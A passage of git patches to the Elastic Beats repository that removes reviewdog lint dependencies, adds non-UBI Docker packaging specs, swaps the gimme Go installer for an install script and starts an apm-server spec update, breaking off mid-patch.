a/generator/_templates/beat/{beat}/tools/tools.go +++ b/generator/_templates/beat/{beat}/tools/tools.go @@ -10,6 +10,5 @@ import ( _ "golang.org/x/tools/cmd/goimports" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" ) diff --git a/generator/_templates/metricbeat/{beat}/tools/tools.go b/generator/_templates/metricbeat/{beat}/tools/tools.go index edd121e211b9..289a0a2cb705 100644 --- a/generator/_templates/metricbeat/{beat}/tools/tools.go +++ b/generator/_templates/metricbeat/{beat}/tools/tools.go @@ -10,6 +10,5 @@ import ( _ "golang.org/x/tools/cmd/goimports" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" ) diff --git a/go.mod b/go.mod index 3c2c0fce6ac6..fb47064f7ca2 100644 --- a/go.mod +++ b/go.mod @@ -137,7 +137,6 @@ require ( github.com/prometheus/procfs v0.0.11 github.com/prometheus/prometheus v2.5.0+incompatible github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0 - github.com/reviewdog/reviewdog v0.9.17 github.com/samuel/go-parser v0.0.0-20130731160455-ca8abbf65d0e // indirect github.com/samuel/go-thrift v0.0.0-20140522043831-2187045faa54 github.com/sanathkr/yaml v1.0.1-0.20170819201035-0056894fa522 // indirect diff --git a/go.sum b/go.sum index d23ec2ecaf68..28477be0c461 100644 --- a/go.sum +++ b/go.sum @@ -139,8 +139,6 @@ github.com/blakerouse/service v1.1.1-0.20200924160513-057808572ffa/go.mod h1:RrJ github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2 h1:oMCHnXa6CCCafdPDbMh/lWRhRByN0VFLvv+g+ayx1SI= github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2/go.mod h1:PkYb9DJNAwrSvRx5DYA+gUcOIgTGVMNkfSCbZM8cWpI= github.com/blang/semver v3.1.0+incompatible/go.mod h1:kRBLl5iJ+tD4TcOOxsy/0fnwebNt5EWlYSAyrTnjyyk= -github.com/bradleyfalzon/ghinstallation v1.1.0 h1:mwazVinJU0mPyLxIcdtJzu4DhWXFO5lMsWhKyFRIwFk= -github.com/bradleyfalzon/ghinstallation v1.1.0/go.mod h1:p7iD8KytOOKg2wCqbwvJlq4JGpYMjwjkiqdyUqOIHLI= github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible h1:4g18+HnTDwEtO0n7K8B1Kjq+04MEKJRkhJNQ/hb9d5A= github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible/go.mod h1:r7ao+4tTNXvWm+VRpRJchr2kQhqxgmAp2iEX5W96gMM= github.com/cavaliercoder/badio v0.0.0-20160213150051-ce5280129e9e h1:YYUjy5BRwO5zPtfk+aa2gw255FIIoi93zMmuy19o0bc= @@ -387,12 +385,6 @@ github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/google/go-github/v28 v28.1.1 h1:kORf5ekX5qwXO2mGzXXOjMe/g6ap8ahVe0sBEulhSxo= -github.com/google/go-github/v28 v28.1.1/go.mod h1:bsqJWQX05omyWVmc00nEUql9mhQyv38lDZ8kPZcQVoM= -github.com/google/go-github/v29 v29.0.2 h1:opYN6Wc7DOz7Ku3Oh4l7prmkOMwEcQxpFtxdU8N8Pts= -github.com/google/go-github/v29 v29.0.2/go.mod h1:CHKiKKPHJ0REzfwc14QMklvtHwCveD0PxlMjLlzAM5E= -github.com/google/go-querystring v1.0.0 h1:Xkwi/a1rcvNg1PPYe5vI8GbeBY/jrVuDX5ASuANWTrk= -github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g= github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= @@ -406,7 +398,6 @@ github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod h1:ZgVRPoUq/hf github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= -github.com/google/subcommands v1.0.1/go.mod h1:ZjhPrFU+Olkh9WazFPsl27BQ4UPiG37m3yTrtFlrHVk= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f h1:XXzyYlFbxK3kWfcmu3Wc+Tv8/QQl/VqwsWuSYF1Rj0s= github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= @@ -455,10 +446,6 @@ github.com/hashicorp/golang-lru v0.5.2-0.20190520140433-59383c442f7d/go.mod h1:/ github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ= github.com/hashicorp/nomad/api v0.0.0-20201203164818-6318a8ac7bf8 h1:Yrz9yGVJf5Ce2KS7x8hS/MUTIeBmGEhF8nhzolRpSqY= github.com/hashicorp/nomad/api v0.0.0-20201203164818-6318a8ac7bf8/go.mod h1:vYHP9jMXk4/T2qNUbWlQ1OHCA1hHLil3nvqSmz8mtgc= -github.com/haya14busa/go-actions-toolkit v0.0.0-20200105081403-ca0307860f01 h1:HiJF8Mek+I7PY0Bm+SuhkwaAZSZP83sw6rrTMrgZ0io= -github.com/haya14busa/go-actions-toolkit v0.0.0-20200105081403-ca0307860f01/go.mod h1:1DWDZmeYf0LX30zscWb7K9rUMeirNeBMd5Dum+seUhc= -github.com/haya14busa/go-checkstyle v0.0.0-20170303121022-5e9d09f51fa1/go.mod h1:RsN5RGgVYeXpcXNtWyztD5VIe7VNSEqpJvF2iEH7QvI= -github.com/haya14busa/secretbox v0.0.0-20180525171038-07c7ecf409f5/go.mod h1:FGO/dXIFZnan7KvvUSFk1hYMnoVNzB6NTMPrmke8SSI= github.com/hectane/go-acl v0.0.0-20190604041725-da78bae5fc95 h1:S4qyfL2sEm5Budr4KVMyEniCy+PbS55651I/a+Kn/NQ= github.com/hectane/go-acl v0.0.0-20190604041725-da78bae5fc95/go.mod h1:QiyDdbZLaJ/mZP4Zwc9g2QsfaEA4o7XvvgZegSci5/E= github.com/hpcloud/tail v1.0.0 h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI= @@ -500,7 +487,6 @@ github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/X github.com/jtolds/gls v4.20.0+incompatible h1:xdiiI2gbIgH/gLH7ADydsJ1uDOEzR8yvV7C0MuV77Wo= github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w= -github.com/justinas/nosurf v1.1.0/go.mod h1:ALpWdSbuNGy2lZWtyXdjkYv4edL23oSEgfBT1gPJ5BQ= github.com/karrick/godirwalk v1.15.6 h1:Yf2mmR8TJy+8Fa0SuQVto5SYap6IF7lNVX4Jdl8G1qA= github.com/karrick/godirwalk v1.15.6/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk= github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q= @@ -523,8 +509,6 @@ github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= -github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc= -github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw= github.com/lib/pq v1.0.0/go.mod h1:5WUZQaWbwv1U+lTReE5YruASi9Al49XbQIvNi/34Woo= github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01 h1:EPw7R3OAyxHBCyl0oqh3lUZqS5lu3KSxzzGasE0opXQ= github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01/go.mod h1:5WUZQaWbwv1U+lTReE5YruASi9Al49XbQIvNi/34Woo= @@ -549,8 +533,6 @@ github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hd github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY= github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= -github.com/mattn/go-shellwords v1.0.7 h1:KqhVjVZomx2puPACkj9vrGFqnp42Htvo9SEAWePHKOs= -github.com/mattn/go-shellwords v1.0.7/go.mod h1:3xCvwCdWdlDJUrvuMn7Wuy9eWs4pE8vqg+NOMyg4B2o= github.com/mattn/go-sqlite3 v1.9.0 h1:pDRiWfl+++eC2FEFRy6jXmQlvp4Yh3z1MJKg4UeYM/4= github.com/mattn/go-sqlite3 v1.9.0/go.mod h1:FPy6KqzDD04eiIsT53CuJW3U88zkxoIYsOqkbpncsNc= github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0= @@ -659,13 +641,8 @@ github.com/prometheus/procfs v0.0.11 h1:DhHlBtkHWPYi8O2y31JkK0TF+DGM+51OopZjH/Ia github.com/prometheus/procfs v0.0.11/go.mod h1:lV6e/gmhEcM9IjHGsFOCxxuZ+z1YqCvr4OA4YeYWdaU= github.com/prometheus/prometheus v2.5.0+incompatible h1:7QPitgO2kOFG8ecuRn9O/4L9+10He72rVRJvMXrE9Hg= github.com/prometheus/prometheus v2.5.0+incompatible/go.mod h1:oAIUtOny2rjMX0OWN5vPR5/q/twIROJvdqnQKDdil/s= -github.com/rakyll/statik v0.1.6/go.mod h1:OEi9wJV/fMUAGx1eNjq75DKDsJVuEv1U0oYdX6GX8Zs= github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0 h1:MkV+77GLUNo5oJ0jf870itWm3D0Sjh7+Za9gazKc5LQ= github.com/rcrowley/go-metrics v0.0.0-20200313005456-10cdbea86bc0/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4= -github.com/reviewdog/errorformat v0.0.0-20200109134752-8983be9bc7dd h1:fvaEkjpr2NJbtnFRCft7D6y/mQ5/2OQU0pKJLW8dwFA= -github.com/reviewdog/errorformat v0.0.0-20200109134752-8983be9bc7dd/go.mod h1:giYAXnpegRDPsXUO7TRpDKXJo1lFGYxyWRfEt5iQ+OA= -github.com/reviewdog/reviewdog v0.9.17 h1:MKb3rlQZgkEXr3d85iqtYNITXn7gDJr2kT0IhgX/X9A= -github.com/reviewdog/reviewdog v0.9.17/go.mod h1:Y0yPFDTi9L5ohkoecJdgbvAhq+dUXp+zI7atqVibwKg= github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/russross/blackfriday v1.5.2 h1:HyvC0ARfnZBqnXwABFeSZHpKvJHJJfPz81GNueLj0oo= @@ -752,8 +729,6 @@ github.com/urso/sderr v0.0.0-20200210124243-c2a16f3d43ec/go.mod h1:Wp40HwmjM59Fk github.com/vbatts/tar-split v0.11.1/go.mod h1:LEuURwDEiWjRjwu46yU3KVGuUdVv/dcnpcEPSzR8z6g= github.com/vmware/govmomi v0.0.0-20170802214208-2cad15190b41 h1:NeNpIvfvaFOh0BH7nMEljE5Rk/VJlxhm58M41SeOD20= github.com/vmware/govmomi v0.0.0-20170802214208-2cad15190b41/go.mod h1:URlwyTFZX72RmxtxuaFL2Uj3fD1JTvZdx59bHWk6aFU= -github.com/xanzy/go-gitlab v0.22.3 h1:/rNlZ2hquUWNc6rJdntVM03tEOoTmnZ1lcNyJCl0WlU= -github.com/xanzy/go-gitlab v0.22.3/go.mod h1:t4Bmvnxj7k37S4Y17lfLx+nLqkf/oQwT2HagfWKv5Og= github.com/xdg/scram v0.0.0-20180814205039-7eeb5667e42c h1:u40Z8hqBAAQyv+vATcGgV0YCnDjqSL7/q/JyPhhJSPk= github.com/xdg/scram v0.0.0-20180814205039-7eeb5667e42c/go.mod h1:lB8K/P019DLNhemzwFU4jHLhdvlE6uDZjXFejJXr49I= github.com/xdg/stringprep v1.0.0 h1:d9X0esnoa3dFsV0FG35rAT0RIhYFlPq7MiP+DW89La0= @@ -839,7 +814,6 @@ golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20181108082009-03003ca0c849/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20181201002055-351d144fa1fc/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= @@ -857,7 +831,6 @@ golang.org/x/net v0.0.0-20191002035440-2ec189313ef0/go.mod h1:z5CRVTTTmAJ677TzLL golang.org/x/net v0.0.0-20191021144547-ec77196f6094/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20191112182307-2180aed22343/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= golang.org/x/net v0.0.0-20200707034311-ab3426394381 h1:VXak5I6aEWmAXeQjA+QSZzlgNrpq9mjcfDemuexIKsU= @@ -865,7 +838,6 @@ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81R golang.org/x/net v0.0.0-20200904194848-62affa334b73 h1:MXfv8rhZWmFeqX3GNZRsd6vOLoaCHjYEX3qkRo3YBUA= golang.org/x/net v0.0.0-20200904194848-62affa334b73/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= -golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190130055435-99b60b757ec1/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -944,7 +916,6 @@ google.golang.org/api v0.15.0 h1:yzlyyDW/J0w8yNFJIhiAJy4kq74S+1DOLdawELNxFMA= google.golang.org/api v0.15.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.2.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/appengine v1.3.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/appengine v1.6.1/go.mod h1:i06prIuMbXzDqacNJfV5OdTW448YApPu5ww/cMBSeb0= diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 3bdf47741581..9598cdd78762 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -75,9 +75,6 @@ GOIMPORTS_REPO?=golang.org/x/tools/cmd/goimports GOIMPORTS_LOCAL_PREFIX?=github.com/elastic GOLINT=golint GOLINT_REPO?=golang.org/x/lint/golint -REVIEWDOG?=reviewdog -conf ${ES_BEATS}/reviewdog.yml -REVIEWDOG_OPTIONS?=-diff "git diff master" -REVIEWDOG_REPO?=github.com/reviewdog/reviewdog/cmd/reviewdog PROCESSES?= 4 TIMEOUT?= 90 PYTHON_TEST_FILES?=$(shell find . -type f -name 'test_*.py' -not -path "*/build/*" -not -path "*/vendor/*" 2>/dev/null) @@ -172,11 +169,6 @@ fmt: add-headers python-env ## @build Runs `goimports -l -w` and `autopep8`on th @goimports -local ${GOIMPORTS_LOCAL_PREFIX} -l -w ${GOFILES_NOVENDOR} @${FIND} -name '*.py' -exec ${PYTHON_ENV}/bin/autopep8 --in-place --max-line-length 120 {} \; -.PHONY: lint -lint: - @go {INSTALL_CMD} $(GOLINT_REPO) $(REVIEWDOG_REPO) - $(REVIEWDOG) $(REVIEWDOG_OPTIONS) - .PHONY: clean clean:: mage ## @build Cleans up all files generated by the build steps @mage clean diff --git a/tools/tools.go b/tools/tools.go index 7708afedfc46..64ab97e4fdc2 100644 --- a/tools/tools.go +++ b/tools/tools.go @@ -31,7 +31,6 @@ import ( _ "gotest.tools/gotestsum/cmd" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" _ "go.elastic.co/go-licence-detector" From 5475407dcdb04ef85f3f2fb55b9e7a5055792055 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Wed, 10 Feb 2021 15:16:35 +0100 Subject: [PATCH 20/63] Generate non UBI based images for x-pack/beats (#23960) --- dev-tools/packaging/packages.yml | 60 ++++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) diff --git a/dev-tools/packaging/packages.yml b/dev-tools/packaging/packages.yml index cac561883cd5..18e1d9e34297 100644 --- a/dev-tools/packaging/packages.yml +++ b/dev-tools/packaging/packages.yml @@ -781,6 +781,14 @@ specs: <<: *deb_rpm_spec <<: *elastic_license_for_deb_rpm + - os: linux + arch: amd64 + types: [docker] + spec: + <<: *docker_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + - os: linux arch: amd64 types: [docker] @@ -790,6 +798,14 @@ specs: <<: *elastic_docker_spec <<: *elastic_license_for_binaries + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + - os: linux arch: arm64 types: [docker] @@ -873,6 +889,17 @@ specs: /usr/share/{{.BeatName}}/bin/{{.BeatName}}{{.BinaryExt}}: source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux + arch: amd64 + types: [docker] + spec: + <<: *docker_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux arch: amd64 types: [docker] @@ -885,6 +912,17 @@ specs: '{{.BeatName}}{{.BinaryExt}}': source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux arch: arm64 types: [docker] @@ -955,6 +993,17 @@ specs: symlink: true mode: 0755 + - os: linux + arch: amd64 + types: [docker] + spec: + <<: *agent_docker_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux arch: amd64 types: [docker] @@ -967,6 +1016,17 @@ specs: '{{.BeatName}}{{.BinaryExt}}': source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *agent_docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux arch: arm64 types: [docker] From fd5a966c3fc93ef6fa183ffdd02044744e9bb76d Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Wed, 10 Feb 2021 18:07:49 +0000 Subject: [PATCH 21/63] [Release] Replace gimme with gvm (#23975) --- Makefile | 3 +-- dev-tools/common.bash | 25 ++++--------------------- 2 files changed, 5 insertions(+), 23 deletions(-) diff --git a/Makefile b/Makefile index c7232087236e..8a1b982baca3 100644 --- a/Makefile +++ b/Makefile @@ -210,8 +210,7 @@ release-manager-snapshot: ## release-manager-release : Builds a snapshot release. The Go version defined in .go-version will be installed and used for the build. .PHONY: release-manager-release release-manager-release: - GO_VERSION=$(shell cat ./.go-version) ./.ci/scripts/install-go.sh - $(MAKE) release + GO_VERSION=$(shell cat ./.go-version) ./dev-tools/run_with_go_ver $(MAKE) release ## beats-dashboards : Collects dashboards from all Beats and generates a zip file distribution. .PHONY: beats-dashboards diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 9f8ac1e1eb46..d6c37fbff4ce 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -34,33 +34,16 @@ get_go_version() { fi } -# install_gimme -# Install gimme to HOME/bin. -install_gimme() { - # Install gimme - if [ ! -f "${HOME}/bin/gimme" ]; then - mkdir -p ${HOME}/bin - curl -sL -o ${HOME}/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/v1.1.0/gimme - chmod +x ${HOME}/bin/gimme - fi - - GIMME="${HOME}/bin/gimme" - debug "Gimme version $(${GIMME} version)" -} - # setup_go_root "version" # This configures the Go version being used. It sets GOROOT and adds # GOROOT/bin to the PATH. It uses gimme to download the Go version if # it does not already exist in the ~/.gimme dir. setup_go_root() { local version=${1} - - install_gimme - - # Setup GOROOT and add go to the PATH. - ${GIMME} "${version}" > /dev/null - source "${HOME}/.gimme/envs/go${version}.env" 2> /dev/null - + export PROPERTIES_FILE=go_env.properties + GO_VERSION="${version}" .ci/scripts/install-go.sh + # shellcheck disable=SC1090 + source "${PROPERTIES_FILE}" 2> /dev/null debug "$(go version)" } From f0f8fe9a637cc5786a5f04181e831673baa316f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Juan=20=C3=81lvarez?= Date: Thu, 11 Feb 2021 08:22:20 +0100 Subject: [PATCH 22/63] Update apm-server spec (#23856) * Copy fleet to inputs to make Kibana host available to apm-server * Remove unneeded keys --- .../elastic-agent/pkg/agent/program/supported.go | 2 +- x-pack/elastic-agent/spec/apm-server.yml | 14 ++++++++++++++ 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/x-pack/elastic-agent/pkg/agent/program/supported.go b/x-pack/elastic-agent/pkg/agent/program/supported.go index 3ad9fbb84636..0e6b7d7d0288 100644 --- a/x-pack/elastic-agent/pkg/agent/program/supported.go +++ b/x-pack/elastic-agent/pkg/agent/program/supported.go @@ -24,7 +24,7 @@ func init() { // spec/heartbeat.yml // spec/metricbeat.yml // spec/packetbeat.yml - unpacked := 